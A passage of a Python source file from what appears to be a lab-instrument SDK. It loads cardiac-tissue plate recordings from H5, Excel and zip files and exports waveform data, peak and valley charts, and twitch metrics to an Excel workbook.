curr_row -= 1
curr_row += 2
return curr_row
def _write_xlsx_device_metadata(
curr_sheet: xlsxwriter.worksheet.Worksheet, first_well_file: WellFile
) -> None:
curr_row = METADATA_INSTRUMENT_ROW_START
curr_sheet.write(curr_row, 0, "Device Information:")
curr_row += 1
curr_sheet.write(curr_row, 1, "H5 File Layout Version")
curr_sheet.write(curr_row, 2, first_well_file.get_h5_attribute("File Format Version"))
curr_row += 1
meta_data = (
(MANTARRAY_SERIAL_NUMBER_UUID, first_well_file.get_mantarray_serial_number()),
(SOFTWARE_RELEASE_VERSION_UUID, first_well_file.get_h5_attribute(str(SOFTWARE_RELEASE_VERSION_UUID))),
(SOFTWARE_BUILD_NUMBER_UUID, first_well_file.get_h5_attribute(str(SOFTWARE_BUILD_NUMBER_UUID))),
(MAIN_FIRMWARE_VERSION_UUID, first_well_file.get_h5_attribute(str(MAIN_FIRMWARE_VERSION_UUID))),
)
for iter_row, (iter_metadata_uuid, iter_value) in enumerate(meta_data):
row_in_sheet = curr_row + iter_row
curr_sheet.write(row_in_sheet, 1, METADATA_UUID_DESCRIPTIONS[iter_metadata_uuid])
curr_sheet.write(row_in_sheet, 2, iter_value)
def _write_xlsx_output_format_metadata(
curr_sheet: xlsxwriter.worksheet.Worksheet,
) -> None:
curr_row = METADATA_OUTPUT_FILE_ROW_START
curr_sheet.write(curr_row, 0, "Output Format:")
curr_row += 1
curr_sheet.write(curr_row, 1, "SDK Version")
curr_sheet.write(curr_row, 2, PACKAGE_VERSION)
curr_row += 1
curr_sheet.write(curr_row, 1, "File Creation Timestamp")
curr_sheet.write(curr_row, 2, datetime.datetime.utcnow().replace(microsecond=0))
def _write_xlsx_recording_metadata(
curr_sheet: xlsxwriter.worksheet.Worksheet, first_well_file: WellFile
) -> None:
curr_sheet.write(METADATA_RECORDING_ROW_START, 0, "Recording Information:")
meta_data = (
(PLATE_BARCODE_UUID, first_well_file.get_plate_barcode()),
(UTC_BEGINNING_RECORDING_UUID, first_well_file.get_begin_recording()),
)
for iter_row, (iter_metadata_uuid, iter_value) in enumerate(meta_data):
row_in_sheet = METADATA_RECORDING_ROW_START + 1 + iter_row
curr_sheet.write(row_in_sheet, 1, METADATA_UUID_DESCRIPTIONS[iter_metadata_uuid])
if isinstance(iter_value, datetime.datetime):
# Excel doesn't support timezones in datetimes
iter_value = iter_value.replace(tzinfo=None)
# Excel also doesn't support precision below millisecond, so chopping off any microseconds.
# Apparently rounding instead of flooring can cause funky issues if it rolls over into a new
# actual 'second' unit, so just flooring. https://stackoverflow.com/questions/11040177/datetime-round-trim-number-of-digits-in-microseconds
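            # e.g. 12:30:05.123456 is stored as 12:30:05.123000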
# pylint:disable=c-extension-no-member
iter_value = iter_value.replace(microsecond=math.floor(iter_value.microsecond / 1000) * 1000)
curr_sheet.write(row_in_sheet, 2, iter_value)
def _write_xlsx_metadata(workbook: xlsxwriter.workbook.Workbook, first_well_file: WellFile) -> None:
logger.info("Writing H5 file metadata")
metadata_sheet = workbook.add_worksheet(METADATA_EXCEL_SHEET_NAME)
curr_sheet = metadata_sheet
_write_xlsx_recording_metadata(curr_sheet, first_well_file)
if not isinstance(first_well_file, ExcelWellFile):
_write_xlsx_device_metadata(curr_sheet, first_well_file)
_write_xlsx_output_format_metadata(curr_sheet)
# Adjust the column widths to be able to see the data
for iter_column_idx, iter_column_width in ((0, 25), (1, 40), (2, 25)):
curr_sheet.set_column(iter_column_idx, iter_column_idx, iter_column_width)
class PlateRecording(FileManagerPlateRecording):
"""Manages aspects of analyzing a plate recording session."""
def __init__(
self,
*args: Any,
pipeline_template: Optional[PipelineTemplate] = None,
**kwargs: Dict[str, Any],
) -> None:
super().__init__(*args, **kwargs)
self._is_optical_recording = isinstance(self._files[0], ExcelWellFile)
self._workbook: xlsxwriter.workbook.Workbook
self._workbook_formats: Dict[str, Format] = dict()
if pipeline_template is None:
first_well_index = self.get_well_indices()[0]
# this file is used to get general information applicable across the recording
first_well_file = self.get_well_by_index(first_well_index)
tissue_sampling_period = (
first_well_file.get_tissue_sampling_period_microseconds() / MICROSECONDS_PER_CENTIMILLISECOND
)
noise_filter_uuid = (
None if self._is_optical_recording else TSP_TO_DEFAULT_FILTER_UUID[tissue_sampling_period]
)
twitches_point_up = True # Anna (04/22/2021): defaults to force data in which the twitches point up since the current data in the SDK is force metrics
if self._is_optical_recording:
twitches_point_up = first_well_file.get_twitches_point_up()
pipeline_template = PipelineTemplate(
tissue_sampling_period=tissue_sampling_period,
noise_filter_uuid=noise_filter_uuid,
is_force_data=twitches_point_up,
is_magnetic_data=not self._is_optical_recording,
)
self._pipeline_template = pipeline_template
self._pipelines: Dict[int, Pipeline]
self._interpolated_data_period: float
@classmethod
def from_directory(cls, dir_to_load_files_from: str) -> Iterator["PlateRecording"]:
"""Load well data from given directory.
Args:
dir_to_load_files_from: directory where well data exists
Returns:
list of PlateRecording objects
"""
recordings = []
# get list of files in directory
zip_file_items = [
f for f in os.listdir(dir_to_load_files_from) if not f.startswith(".") if f.endswith(".zip")
]
h5_file_items = [
"/".join([dir_to_load_files_from, f])
for f in os.listdir(dir_to_load_files_from)
if not f.startswith(".")
if f.endswith(".h5")
]
excel_file_items = [
"/".join([dir_to_load_files_from, f])
for f in os.listdir(dir_to_load_files_from)
if not f.startswith(".")
if f.endswith(".xlsx")
]
# iterate over zipped files
if len(zip_file_items) > 0:
for zip_file in zip_file_items:
plate_recording = cls._load_zip_file(dir_to_load_files_from, zip_file)
recordings.append(plate_recording)
# load h5 files
if len(h5_file_items) > 0:
plate_recording = cls(h5_file_items)
recordings.append(plate_recording)
# load excel files
if len(excel_file_items) > 0:
            optical_well_files = [
                # excel_file_items already holds full paths (joined above), so use them directly
                ExcelWellFile(excel_file_item)
                for excel_file_item in excel_file_items
            ]
plate_recording = cls(optical_well_files)
recordings.append(plate_recording)
msg = f"Found recordings from {len(recordings)} plate(s)."
logger.info(msg)
for plate in recordings:
yield plate
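        # Illustrative usage of this generator (the directory names are assumptions):
        #     for recording in PlateRecording.from_directory("./recordings"):
        #         recording.write_xlsx("./xlsx_output")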
@classmethod
def _load_zip_file(cls, dir_to_load_files_from: str, file_name: str) -> Union["PlateRecording", Any]:
"""Load indiviual zip file.
Assumes that the zip file only contains .h5 or .xlsx files and is not a nested directory structure.
Args:
dir_to_load_files_from: directory where data files exist
file_name: single file path
Returns:
PlateRecording object
"""
# get path of first item in list
path_to_zip_file = os.path.join(dir_to_load_files_from, file_name)
tmpdir = tempfile.mkdtemp()
# load the first item in list
# assumes first item contains list of .h5 or .xlsx files
with zipfile.ZipFile(path_to_zip_file, "r") as zip_ref:
members = [
member
for member in zip_ref.namelist()
if (member.endswith(".h5") or member.endswith(".xlsx")) and "__MACOSX" not in member
# Tanner (10/1/20): "__MACOSX" is an artifact of zipping a file on MacOS that is not
# needed by the SDK. This is likely not a typical use case, but this prevents problems in
# case a user does zip their files on Mac
]
# extract zip file contents to tmpdir
zip_ref.extractall(path=tmpdir, members=members)
# Kristian (9/6/21): for some reason, zip files are not extracted in tmpdir, but in a directory
# in tmpdir that is named based on zipped file name
if any("/" in member for member in members):
tmpnest = "/".join([tmpdir, members[0].split("/")[0]])
else:
tmpnest = tmpdir
if any(member.endswith(".xlsx") for member in members):
excel_members = ["/".join([tmpdir, excel_file_item]) for excel_file_item in members]
optical_well_files = [ExcelWellFile(excel_member) for excel_member in excel_members]
return cls(optical_well_files)
return super().from_directory(tmpnest)
def _init_pipelines(self) -> None:
try:
self._pipelines # pylint:disable=pointless-statement # Eli (9/11/20): this will cause the attribute error to be raised if the pipelines haven't yet been initialized
return
except AttributeError:
pass
self._pipelines = dict()
num_wells = len(self.get_well_indices())
for i, iter_well_idx in enumerate(self.get_well_indices()):
iter_pipeline = self.get_pipeline_template().create_pipeline()
well = self.get_well_by_index(iter_well_idx)
well_name = TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(iter_well_idx)
msg = f"Loading tissue and reference data... {int(round(i / num_wells, 2) * 100)}% (Well {well_name}, {i + 1} out of {num_wells})"
logger.info(msg)
raw_tissue_reading = well.get_raw_tissue_reading()
if self._is_optical_recording:
raw_tissue_reading[0] *= CENTIMILLISECONDS_PER_SECOND
iter_pipeline.load_raw_magnetic_data(raw_tissue_reading, well.get_raw_reference_reading())
self._pipelines[iter_well_idx] = iter_pipeline
def get_pipeline_template(self) -> PipelineTemplate:
return self._pipeline_template
def get_reference_magnetic_data(self, well_idx: int) -> NDArray[(2, Any), int]:
self._init_pipelines()
return self._pipelines[well_idx].get_raw_reference_magnetic_data()
def create_stacked_plot(self) -> Figure:
"""Create a stacked plot of all wells in the recording."""
# Note Eli (9/11/20): this is hardcoded for a very specific use case at the moment and just visually tested using the newly evolving visual regression tool
self._init_pipelines()
factor = 0.25
plt.figure(figsize=(15 * factor, 35 * 1), dpi=300)
ax1 = plt.subplot(24, 1, 1)
ax1.set(ylabel="A1")
plt.setp(ax1.get_xticklabels(), visible=False)
count = 0
for _, iter_pipeline in self._pipelines.items():
if count == 0:
pass
else:
iter_ax = plt.subplot(24, 1, count + 1, sharex=ax1)
iter_ax.set(ylabel=TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(count))
if count != 23:
plt.setp(iter_ax.get_xticklabels(), visible=False)
else:
iter_ax.set(xlabel="Time (seconds)")
filtered_data = iter_pipeline.get_noise_filtered_magnetic_data()
plt.plot(filtered_data[0] / CENTIMILLISECONDS_PER_SECOND, filtered_data[1], linewidth=0.5)
# plt.plot(filtered_data[0,:int(30*CENTIMILLISECONDS_PER_SECOND/960)]/CENTIMILLISECONDS_PER_SECOND,filtered_data[1,:int(30*CENTIMILLISECONDS_PER_SECOND/960)])
count += 1
return plt.gcf()
def write_xlsx(
self,
file_dir: str,
file_name: Optional[str] = None,
create_continuous_waveforms: bool = True,
create_waveform_charts: bool = True,
twitch_width_values: Tuple[int, ...] = (10, 25, 50, 75, 90),
show_twitch_coordinate_values: bool = False,
show_twitch_time_diff_values: bool = False,
) -> None:
"""Create an XLSX file.
Args:
file_dir: the directory in which to create the file.
file_name: By default an automatic name is generated based on barcode and recording date. Extension will always be xlsx---if user provides something else then it is stripped
create_continuous_waveforms: typically used in unit testing, if set to True, the continuous-waveforms sheet and continuous-waveform-plots sheet will be created with no content
create_waveform_charts: typically used in unit testing, if set to True, only the continuous-waveform-plots sheet will be created with no content
twitch_width_values: a Tuple indicating which twitch width values should be included on the xlsx sheet, if none is given default to all.
show_twitch_coordinate_values: a boolean indicating whether or not to show the twitch coordinates, if none defaults to false. If true, it will have to same coordinate values as twitch_width_values
show_twitch_time_diff_values: a boolean indicating whether or not to show the twitch timepoint difference values, if none defaults to false. If true, it will have to same coordinate values as twitch_width_values
"""
first_well_index = self.get_well_indices()[0]
# this file is used to get general information applicable across the recording
first_well_file = self.get_well_by_index(first_well_index)
logger.info("Loading data from H5 file(s)")
self._init_pipelines()
if file_name is None:
file_name = f"{first_well_file.get_plate_barcode()}__{first_well_file.get_begin_recording().strftime('%Y_%m_%d_%H%M%S')}.xlsx"
file_path = os.path.join(file_dir, file_name)
logger.info("Opening .xlsx file")
self._workbook = Workbook(file_path, {"default_date_format": "YYYY-MM-DD hh:mm:ss UTC"})
for iter_format_name, iter_format in ALL_FORMATS.items():
self._workbook_formats[iter_format_name] = self._workbook.add_format(iter_format)
_write_xlsx_metadata(self._workbook, first_well_file)
self._write_xlsx_continuous_waveforms(
skip_content=(not create_continuous_waveforms),
skip_charts=(not create_waveform_charts),
)
self._write_xlsx_aggregate_metrics(twitch_width_values)
twitch_coordinate_values: Tuple[int, ...]
twitch_coordinate_values = ()
twitch_time_diff_values: Tuple[int, ...]
twitch_time_diff_values = ()
if show_twitch_coordinate_values:
twitch_coordinate_values = twitch_width_values
if show_twitch_time_diff_values:
twitch_time_diff_values = twitch_width_values
self._write_xlsx_per_twitch_metrics(
twitch_width_values, twitch_coordinate_values, twitch_time_diff_values
)
logger.info("Saving .xlsx file")
        self._workbook.close()  # This is actually when the file gets written to disk
logger.info("Done writing to .xlsx")
def _write_xlsx_continuous_waveforms(self, skip_content: bool = False, skip_charts: bool = False) -> None:
# pylint: disable-msg=too-many-locals
continuous_waveform_sheet = self._workbook.add_worksheet(CONTINUOUS_WAVEFORM_SHEET_NAME)
self._workbook.add_worksheet(SNAPSHOT_CHART_SHEET_NAME)
self._workbook.add_worksheet(FULL_CHART_SHEET_NAME)
if skip_content:
return
logger.info("Creating waveform data sheet")
curr_sheet = continuous_waveform_sheet
# create headings
curr_sheet.write(0, 0, "Time (seconds)")
for i in range(TWENTY_FOUR_WELL_PLATE.row_count * TWENTY_FOUR_WELL_PLATE.column_count):
name_to_write = (
f"{TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(i)} - Active Twitch Force (μN)"
)
curr_sheet.write(0, 1 + i, name_to_write)
# initialize time values (use longest data)
max_time_index = 0
for well_index in self.get_well_indices():
well_pipeline = self._pipelines[well_index]
last_time_index = well_pipeline.get_raw_tissue_magnetic_data()[0][-1]
if last_time_index > max_time_index:
max_time_index = last_time_index
self._interpolated_data_period = (
int(self._files[0].get_interpolation_value() / MICROSECONDS_PER_CENTIMILLISECOND)
if self._is_optical_recording
else INTERPOLATED_DATA_PERIOD_CMS
)
interpolated_data_indices = np.arange(
self._interpolated_data_period, # don't start at time zero, because some wells don't have data at exactly zero (causing interpolation to fail), so just start at the next timepoint
max_time_index,
self._interpolated_data_period,
)
for i, data_index in enumerate(interpolated_data_indices):
# display in seconds in the Excel sheet
seconds = data_index / CENTIMILLISECONDS_PER_SECOND
curr_sheet.write(i + 1, 0, seconds)
# add data for valid wells
well_indices = self.get_well_indices()
num_wells = len(well_indices)
for iter_well_idx, well_index in enumerate(well_indices):
filtered_data = self._pipelines[well_index].get_force()
# interpolate data (at 100 Hz for H5) to max valid interpolated data point
interpolated_data_function = interpolate.interp1d(filtered_data[0], filtered_data[1])
well_name = TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(well_index)
msg = f"Writing waveform data of well {well_name} ({iter_well_idx + 1} out of {num_wells})"
logger.info(msg)
# finding last index in interpolated data indices
first_index, last_index = 0, len(interpolated_data_indices) - 1
# decrementing the last index marker until the last time point in filtered_data is greater than the value of interpolated_data_indices at the last index
while filtered_data[0][-1] < interpolated_data_indices[last_index]:
last_index -= 1
            # incrementing last_index so the previously found index value less than the last filtered_data timepoint is included in the interpolate function and represents the correct number of data points
last_index += 1
while filtered_data[0][0] > interpolated_data_indices[first_index]:
first_index += 1
interpolated_data = interpolated_data_function(interpolated_data_indices[first_index:last_index])
if not self._is_optical_recording: # flip magnetic data waveform
interpolated_data *= -1
minimum_value = min(interpolated_data)
interpolated_data -= minimum_value
interpolated_data *= MICRO_TO_BASE_CONVERSION
# write to sheet
for i, data_point in enumerate(interpolated_data):
curr_sheet.write(i + 1, well_index + 1, data_point)
self._create_waveform_charts(
skip_charts,
iter_well_idx,
last_index,
well_index,
well_name,
filtered_data[0],
interpolated_data_function,
minimum_value,
)
# The formatting items below are not explicitly unit-tested...not sure the best way to do this
# Adjust the column widths to be able to see the data
curr_sheet.set_column(0, 0, 18)
well_indices = self.get_well_indices()
for iter_well_idx in range(24):
curr_sheet.set_column(
iter_well_idx + 1,
iter_well_idx + 1,
13,
options={"hidden": iter_well_idx not in well_indices},
)
curr_sheet.freeze_panes(1, 1)
# pylint: disable=too-many-locals
def _create_waveform_charts(
self,
skip_charts: bool,
iter_well_idx: int,
num_data_points: int,
well_index: int,
well_name: str,
time_values: NDArray[(2, Any), int],
interpolated_data_function: interpolate.interpolate.interp1d,
minimum_value: float,
) -> None:
snapshot_chart_sheet = self._workbook.get_worksheet_by_name(SNAPSHOT_CHART_SHEET_NAME)
full_chart_sheet = self._workbook.get_worksheet_by_name(FULL_CHART_SHEET_NAME)
msg = f"Creating chart of waveform data of well {well_name}"
logger.info(msg)
snapshot_chart = None
full_chart = None
if not skip_charts:
snapshot_chart = self._workbook.add_chart({"type": "scatter", "subtype": "straight"})
full_chart = self._workbook.add_chart({"type": "scatter", "subtype": "straight"})
well_column = xl_col_to_name(well_index + 1)
recording_stop_time = time_values[-1] // CENTIMILLISECONDS_PER_SECOND
lower_x_bound = (
0
if recording_stop_time <= CHART_WINDOW_NUM_SECONDS
else int((recording_stop_time - CHART_WINDOW_NUM_SECONDS) // 2)
)
upper_x_bound = (
recording_stop_time
if recording_stop_time <= CHART_WINDOW_NUM_SECONDS
else int((recording_stop_time + CHART_WINDOW_NUM_SECONDS) // 2)
)
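        # The snapshot window is CHART_WINDOW_NUM_SECONDS wide and centered on the midpoint of the
        # recording (e.g. a 120 second recording with a 10 second window is bounded at 55 s and 65 s).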
msg = f"Adding peak and valley markers to chart of well {well_name}"
logger.info(msg)
for chart, chart_sheet in ((snapshot_chart, snapshot_chart_sheet), (full_chart, full_chart_sheet)):
if chart is not None: # Tanner (11/11/20): chart is None when skipping chart creation
chart.add_series(
{
"name": "Waveform Data",
"categories": f"='continuous-waveforms'!$A$2:$A${num_data_points}",
"values": f"='continuous-waveforms'!${well_column}$2:${well_column}${num_data_points}",
"line": {"color": "#1B9E77"},
}
)
peak_indices, valley_indices = self._pipelines[well_index].get_peak_detection_results()
self._add_peak_detection_series(
chart,
"Peak",
well_index,
well_name,
num_data_points,
peak_indices,
interpolated_data_function,
time_values,
minimum_value,
)
self._add_peak_detection_series(
chart,
"Valley",
well_index,
well_name,
num_data_points,
valley_indices,
interpolated_data_function,
time_values,
minimum_value,
)
if chart is None: # Tanner (11/11/20): chart is None when skipping chart creation
continue
(well_row, well_col) = TWENTY_FOUR_WELL_PLATE.get_row_and_column_from_well_index(well_index)
x_axis_settings: Dict[str, Any] = {"name": "Time (seconds)"}
if chart == snapshot_chart:
x_axis_settings["min"] = lower_x_bound
x_axis_settings["max"] = upper_x_bound
else:
x_axis_settings["min"] = 0
x_axis_settings["max"] = recording_stop_time
chart.set_x_axis(x_axis_settings)
y_axis_label = (
"Post Displacement (microns)" if self._is_optical_recording else "Active Twitch Force (μN)"
)
chart.set_y_axis({"name": y_axis_label, "major_gridlines": {"visible": 0}})
width = (
CHART_FIXED_WIDTH
if chart == snapshot_chart
else CHART_FIXED_WIDTH // 2
+ (DEFAULT_CELL_WIDTH * int(recording_stop_time / SECONDS_PER_CELL))
)
chart.set_size({"width": width, "height": CHART_HEIGHT})
chart.set_title({"name": f"Well {well_name}"})
if chart == snapshot_chart:
chart_sheet.insert_chart(
1 + well_row * (CHART_HEIGHT_CELLS + 1),
1 + well_col * (CHART_FIXED_WIDTH_CELLS + 1),
chart,
)
else:
chart_sheet.insert_chart(
1 + iter_well_idx * (CHART_HEIGHT_CELLS + 1),
1,
chart,
)
def _add_peak_detection_series(
self,
waveform_chart: xlsxwriter.chart_scatter.ChartScatter,
detector_type: str,
well_index: int,
well_name: str,
upper_x_bound_cell: int,
indices: NDArray[(1, Any), int],
interpolated_data_function: interpolate.interpolate.interp1d,
time_values: NDArray[(2, Any), int],
minimum_value: float,
) -> None:
label = "Relaxation" if detector_type == "Valley" else "Contraction"
offset = 1 if detector_type == "Valley" else 0
marker_color = "#D95F02" if detector_type == "Valley" else "#7570B3"
continuous_waveform_sheet = self._workbook.get_worksheet_by_name(CONTINUOUS_WAVEFORM_SHEET_NAME)
result_column = xl_col_to_name(PEAK_VALLEY_COLUMN_START + (well_index * 2) + offset)
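        # Each well gets a pair of columns starting at PEAK_VALLEY_COLUMN_START: one for peak
        # (contraction) markers and one, offset by 1, for valley (relaxation) markers.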
continuous_waveform_sheet.write(f"{result_column}1", f"{well_name} {detector_type} Values")
for idx in indices:
idx_time = time_values[idx] / CENTIMILLISECONDS_PER_SECOND
shifted_idx_time = idx_time - time_values[0] / CENTIMILLISECONDS_PER_SECOND
uninterpolated_time_seconds = round(idx_time, 2)
shifted_time_seconds = round(shifted_idx_time, 2)
if self._is_optical_recording:
row = int(
shifted_time_seconds * CENTIMILLISECONDS_PER_SECOND / self._interpolated_data_period
)
value = (
interpolated_data_function(uninterpolated_time_seconds * CENTIMILLISECONDS_PER_SECOND)
- minimum_value
) * MICRO_TO_BASE_CONVERSION
else:
row = shifted_time_seconds * int(1 / INTERPOLATED_DATA_PERIOD_SECONDS) + 1
interpolated_data = interpolated_data_function(
uninterpolated_time_seconds * CENTIMILLISECONDS_PER_SECOND
)
interpolated_data *= -1 # magnetic waveform is flipped
interpolated_data -= minimum_value
value = interpolated_data * MICRO_TO_BASE_CONVERSION
continuous_waveform_sheet.write(f"{result_column}{row}", value)
if waveform_chart is not None: # Tanner (11/11/20): chart is None when skipping chart creation
waveform_chart.add_series(
{
"name": label,
"categories": f"='continuous-waveforms'!$A$2:$A${upper_x_bound_cell}",
"values": f"='continuous-waveforms'!${result_column}$2:${result_column}${upper_x_bound_cell}",
"marker": {
"type": "circle",
"size": 8,
"border": {"color": marker_color, "width": 1.5},
"fill": {"none": True},
},
"line": {"none": True},
}
)
def _write_xlsx_per_twitch_metrics(
self,
twitch_width_values: Tuple[int, ...],
twitch_coordinate_values: Tuple[int, ...],
twitch_time_diff_values: Tuple[int, ...],
) -> None:
logger.info("Creating per-twitch metrics sheet")
curr_sheet = self._workbook.add_worksheet(PER_TWITCH_METRICS_SHEET_NAME)
self._workbook.add_worksheet(TWITCH_FREQUENCIES_CHART_SHEET_NAME)
self._workbook.add_worksheet(FORCE_FREQUENCY_RELATIONSHIP_SHEET)
curr_row = 0
well_indices = self.get_well_indices()
for iter_well_idx in range(TWENTY_FOUR_WELL_PLATE.row_count * TWENTY_FOUR_WELL_PLATE.column_count):
well_name = TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(iter_well_idx)
curr_sheet.write(curr_row, 0, well_name)
if iter_well_idx in well_indices:
iter_pipeline = self._pipelines[iter_well_idx]
error_msg = ""
try:
(per_twitch_dict, aggregate_metrics_dict) = iter_pipeline.get_force_data_metrics()
except PeakDetectionError as e:
error_msg = "Error: "
if isinstance(e, TwoPeaksInARowError):
error_msg += "Two Contractions in a Row Detected"
elif isinstance(e, TwoValleysInARowError):
error_msg += "Two Relaxations in a Row Detected"
elif isinstance(e, TooFewPeaksDetectedError):
error_msg += "Not Enough Twitches Detected"
else:
raise NotImplementedError("Unknown PeakDetectionError") from e
curr_sheet.write(curr_row, 1, "N/A")
curr_sheet.write(curr_row + 1, 1, error_msg)
else:
filtered_data = iter_pipeline.get_force()[1]
force_minimum_value = min(filtered_data) * MICRO_TO_BASE_CONVERSION
number_twitches = aggregate_metrics_dict[AMPLITUDE_UUID]["n"]
curr_row = _write_per_twitch_metric_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_width_values,
twitch_coordinate_values,
force_minimum_value,
twitch_time_diff_values,
)
twitch_timepoints = list(per_twitch_dict)
self._create_frequency_vs_time_charts(
iter_well_idx, well_name, number_twitches, twitch_timepoints
)
self._create_force_frequency_relationship_charts(
iter_well_idx, well_name, number_twitches
)
curr_row += 1
curr_sheet.write(curr_row, 0, "Timepoint of Twitch Contraction")
curr_row += 1
curr_row = _write_per_twitch_metric_labels(
curr_sheet,
curr_row,
twitch_width_values,
twitch_coordinate_values,
twitch_time_diff_values,
)
curr_row += (
NUMBER_OF_PER_TWITCH_METRICS
- len(CALCULATED_METRIC_DISPLAY_NAMES)
- len(twitch_width_values)
- (4 * len(twitch_coordinate_values))
- (2 * len(twitch_time_diff_values))
) # include a single row gap in between the data for each well
def _create_force_frequency_relationship_charts(
self,
well_index: int,
well_name: str,
num_data_points: int,
) -> None:
force_frequency_sheet = self._workbook.get_worksheet_by_name(FORCE_FREQUENCY_RELATIONSHIP_SHEET)
msg = f"Creating chart of force-frequency data of well {well_name}"
logger.info(msg)
force_frequency_chart = self._workbook.add_chart({"type": "scatter"})
well_row = well_index * (NUMBER_OF_PER_TWITCH_METRICS + 2)
last_column = xl_col_to_name(num_data_points)
force_frequency_chart.add_series(
{
"categories": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 4}:${last_column}${well_row + 4}",
"values": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 5}:${last_column}${well_row + 5}",
}
)
force_frequency_chart.set_legend({"none": True})
x_axis_label = CALCULATED_METRIC_DISPLAY_NAMES[TWITCH_FREQUENCY_UUID]
force_frequency_chart.set_x_axis({"name": x_axis_label})
y_axis_label = CALCULATED_METRIC_DISPLAY_NAMES[AMPLITUDE_UUID]
force_frequency_chart.set_y_axis({"name": y_axis_label, "major_gridlines": {"visible": 0}})
force_frequency_chart.set_size({"width": CHART_FIXED_WIDTH, "height": CHART_HEIGHT})
force_frequency_chart.set_title({"name": f"Well {well_name}"})
well_row, well_col = TWENTY_FOUR_WELL_PLATE.get_row_and_column_from_well_index(well_index)
force_frequency_sheet.insert_chart(
1 + well_row * (CHART_HEIGHT_CELLS + 1),
1 + well_col * (CHART_FIXED_WIDTH_CELLS + 1),
force_frequency_chart,
)
def _create_frequency_vs_time_charts(
self,
well_index: int,
well_name: str,
num_data_points: int,
time_values: NDArray[(1, Any), int],
) -> None:
frequency_chart_sheet = self._workbook.get_worksheet_by_name(TWITCH_FREQUENCIES_CHART_SHEET_NAME)
msg = f"Creating chart of frequency data of well {well_name}"
logger.info(msg)
frequency_chart = self._workbook.add_chart({"type": "scatter"})
well_row = well_index * (NUMBER_OF_PER_TWITCH_METRICS + 2)
last_column = xl_col_to_name(num_data_points)
frequency_chart.add_series(
{
"categories": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 2}:${last_column}${well_row + 2}",
"values": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 4}:${last_column}${well_row + 4}",
}
)
frequency_chart.set_legend({"none": True})
x_axis_settings: Dict[str, Any] = {"name": "Time (seconds)"}
x_axis_settings["min"] = 0
x_axis_settings["max"] = time_values[-1] // CENTIMILLISECONDS_PER_SECOND
frequency_chart.set_x_axis(x_axis_settings)
y_axis_label = CALCULATED_METRIC_DISPLAY_NAMES[TWITCH_FREQUENCY_UUID]
frequency_chart.set_y_axis({"name": y_axis_label, "min": 0, "major_gridlines": {"visible": 0}})
frequency_chart.set_size({"width": CHART_FIXED_WIDTH, "height": CHART_HEIGHT})
frequency_chart.set_title({"name": f"Well {well_name}"})
well_row, well_col = TWENTY_FOUR_WELL_PLATE.get_row_and_column_from_well_index(well_index)
frequency_chart_sheet.insert_chart(
1 + well_row * (CHART_HEIGHT_CELLS + 1),
1 + well_col * (CHART_FIXED_WIDTH_CELLS + 1),
frequency_chart,
)
def _write_xlsx_aggregate_metrics(self, twitch_width_values: Tuple[int, ...]) -> None:
logger.info("Creating aggregate metrics sheet")
curr_sheet = self._workbook.add_worksheet(AGGREGATE_METRICS_SHEET_NAME)
curr_row = 0
for iter_well_idx in range(TWENTY_FOUR_WELL_PLATE.row_count * TWENTY_FOUR_WELL_PLATE.column_count):
curr_sheet.write(
curr_row,
2 + iter_well_idx,
TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(iter_well_idx),
)
curr_row += 1
curr_sheet.write(curr_row, 1, "Treatment Description")
curr_row += 1
curr_sheet.write(curr_row, 1, "n (twitches)")
well_indices = self.get_well_indices()
for iter_well_idx in well_indices:
iter_pipeline = self._pipelines[iter_well_idx]
error_msg = ""
try:
_, aggregate_metrics_dict = iter_pipeline.get_force_data_metrics()
except PeakDetectionError as e:
error_msg = "Error: "
if isinstance(e, TwoPeaksInARowError):
error_msg += "Two Contractions in a Row Detected"
elif isinstance(e, TwoValleysInARowError):
error_msg += "Two Relaxations in a Row Detected"
elif isinstance(e, TooFewPeaksDetectedError):
error_msg += "Not Enough Twitches Detected"
else:
raise NotImplementedError("Unknown PeakDetectionError") from e
curr_sheet.write(curr_row, 2 + iter_well_idx, "N/A")
curr_sheet.write(curr_row + 1, 2 + iter_well_idx, error_msg)
else:
curr_sheet.write(
curr_row,
2 + iter_well_idx,
aggregate_metrics_dict[AMPLITUDE_UUID]["n"],
)
curr_row += 1
# row_where_data_starts=curr_row
for iter_metric_uuid, iter_metric_name in CALCULATED_METRIC_DISPLAY_NAMES.items():
if iter_metric_uuid == TIME_DIFFERENCE_UUID:
continue
curr_row += 1
new_row = self._write_submetrics(
curr_sheet,
curr_row,
iter_metric_uuid,
iter_metric_name,
)
curr_row = new_row
for twitch_width_percent_value in TWITCH_WIDTH_METRIC_DISPLAY_NAMES:
if twitch_width_percent_value in twitch_width_values:
twitch_width_percent_info = (
twitch_width_percent_value,
TWITCH_WIDTH_METRIC_DISPLAY_NAMES[twitch_width_percent_value],
)
curr_row += 1
new_row = self._write_submetrics(
curr_sheet,
curr_row,
WIDTH_UUID,
twitch_width_percent_info,
)
curr_row = new_row
# write aggregate statistics for time-to-peak from contraction / relaxation
if TIME_DIFFERENCE_UUID in CALCULATED_METRIC_DISPLAY_NAMES:
for difference_uuid in [CONTRACTION_TIME_UUID, RELAXATION_TIME_UUID]:
if difference_uuid == CONTRACTION_TIME_UUID:
display_names = CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES
elif difference_uuid == RELAXATION_TIME_UUID:
display_names = RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES
                for twitch_width_percent_value in display_names:
                    if twitch_width_percent_value in twitch_width_values:
twitch_time_diff_info = (
twitch_width_percent_value,
display_names[twitch_width_percent_value],
)
curr_row += 1
new_row = self._write_submetrics(
curr_sheet, curr_row, difference_uuid, twitch_time_diff_info
)
curr_row = new_row
        # The formatting below is presentation-only (column widths, hidden columns, frozen panes)
        # and is not explicitly unit-tested.
# Adjust the column widths to be able to see the data
for iter_column_idx, iter_column_width in ((0, 40), (1, 25)):
curr_sheet.set_column(iter_column_idx, iter_column_idx, iter_column_width)
# adjust widths of well columns
